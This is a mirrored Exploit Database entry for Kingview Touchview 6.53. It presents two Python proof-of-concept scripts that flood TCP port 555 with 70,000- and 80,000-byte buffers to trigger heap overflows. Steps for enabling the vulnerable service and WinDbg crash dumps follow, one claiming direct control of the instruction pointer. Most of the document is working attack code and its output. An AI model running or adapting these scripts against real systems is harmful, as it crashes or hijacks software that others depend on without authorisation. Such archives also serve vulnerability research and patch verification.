Kingview Touchview 6.53 – Multiple Heap Overflow Vulnerabilities

• Exploit Database
• 51 阅读

• 作者： Carlos Mario Penagos Hollmann
  日期： 2012-06-25
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/19389/

• # Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
  # Date: June 24 2012
  # Exploit Author: Carlos Mario Penagos Hollmann
  # Vendor Homepage: www.kingview.com
  
  # Version: 6.53
  # Tested on: Windows SP 1
  # CVE :
  
  Open kingivew click on Make choose network configuration--->network
  parameter , thengo to the node type and choose Local is a Login Server,
  run the demo port 555 will be open.
  NOTE:
  This was already patched by the vendor silently.
  
  import os
  import socket
  import sys
  
  host ="10.0.2.15"
  port = 555
  
  exploit=("D"*70000)
  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s2.connect((host,port))
  s2.send(exploit)
  data = s2.recv(1024)
  s2.close()
  
  eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748
  edi=00000004
  eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0 nv up ei pl nz na pe
  nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000
  efl=00010206
  ntdll!tan+0xcf:
  7c902a9d 8b18mov ebx,dword ptr [eax]ds:0023:42424242=?????
  c902a8d 55pushebp
  7c902a8e 8be9mov ebp,ecx
  7c902a90 8b5504mov edx,dword ptr [ebp+4]
  7c902a93 8b4500mov eax,dword ptr [ebp]
  7c902a96 0bc0oreax,eax
  7c902a98 740cjentdll!tan+0xd8 (7c902aa6)
  7c902a9a 8d4afflea ecx,[edx-1]
  7c902a9d 8b18mov ebx,dword ptr [eax]
  ds:0023:42424242=????????
  7c902a9f f00fc74d00lock cmpxchg8b qword ptr [ebp]
  7c902aa4 75f0jne ntdll!tan+0xc8 (7c902a96)
  7c902aa6 5dpop ebp
  7c902aa7 5bpop ebx
  7c902aa8 c3ret
  7c902aa9 8d4900lea ecx,[ecx]
  7c902aac 8f0424pop dword ptr [esp]
  7c902aaf 90nop
  7c902ab0 53pushebx
  7c902ab1 55pushebp
  
  
  
  ###############################################################
  
  
  # Exploit Title: Kingview Touchview EIP direct control
  # Date: June 24 2012
  # Exploit Author: Carlos Mario Penagos Hollmann
  # Vendor Homepage: www.kingview.com
  
  # Version: 6.53
  # Tested on: Windows SP 1
  # CVE :
  
  Open kingivew click on Make choose network configuration--->network
  parameter , then go to the node type and choose Local is a Login Server,
  run the demo port 555 will be open.
  NOTE:
  This was already patched by the vendor silently.
  
  
  import os
  import socket
  import sys
  
  host ="10.0.2.15"
  port = 555
  
  exploit=("B"*80000)
  
  
  
  
  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s2.connect((host,port))
  s2.send(exploit)
  data = s2.recv(1024)
  s2.close()
  
  7c91b1ea 8b4610 mov eax,dword ptr [esi+10h]
  7c91b1ed 3bc3 cmp eax,ebx
  7c91b1ef 8945fc mov dword ptr [ebp-4],eax
  7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f
  (7c91b296)
  7c91b1f8 8b06 mov eax,dword ptr [esi]
  7c91b1fa ff4010 inc dword ptr [eax+10h]
  ds:0023:42424252=????????
  7c91b1fd 8b45fc mov eax,dword ptr [ebp-4]
  7c91b200 83e001 and eax,1
  7c91b203 8945e8 mov dword ptr [ebp-18h],eax
  
  
  ntdll!RtlpWaitForCriticalSection+0x5b